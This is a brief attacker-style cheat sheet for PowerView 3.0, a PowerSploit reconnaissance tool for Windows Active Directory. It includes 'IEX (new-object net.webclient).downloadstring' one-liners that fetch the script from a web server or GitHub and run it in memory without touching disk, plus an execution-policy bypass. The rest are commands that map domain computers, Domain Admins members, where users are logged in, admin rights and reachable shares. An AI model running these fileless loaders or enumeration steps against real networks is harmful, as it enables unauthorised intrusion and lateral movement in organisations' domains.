PowerView 3.0


https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
http://bit.ly/1pzQCnv

IEX (new-object net.webclient).downloadstring('http://192.168.0.11/powerview.ps1')
Import the PowerView module without touching disk (from a local web server).

IEX (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Import the PowerView module without touching disk (if connected to the internet).

powershell -exec bypass
import-module powerview.ps1
Import the PowerView module from disk.

Get-DomainComputer | select Name
List all domain computers.

Get-NetGroup *admin* | select Name
List all domain groups with "admin" in the name.

Get-DomainGroupMember -Identity "Domain Admins" -recurse | select MemberName
List all users in the "Domain Admins" group, including members of nested groups.

Find-DomainUserLocation -UserIdentity admin,administrator,etc...
Locate where users are on the domain.

Find-DomainUserLocation -ComputerName X,Y,etc...
Enumerate users on a host.

Find-GPOLocation -UserName X
Find where a specific user has administrative rights.

Find-DomainShare -ComputerName X -CheckShareAccess
Enumerate shares the current user has access to.
The "-ComputerName" flag can be left off to search all hosts in the domain.
The "-CheckShareAccess" flag can be left off to also search the host(s) for shares the user does not have access to.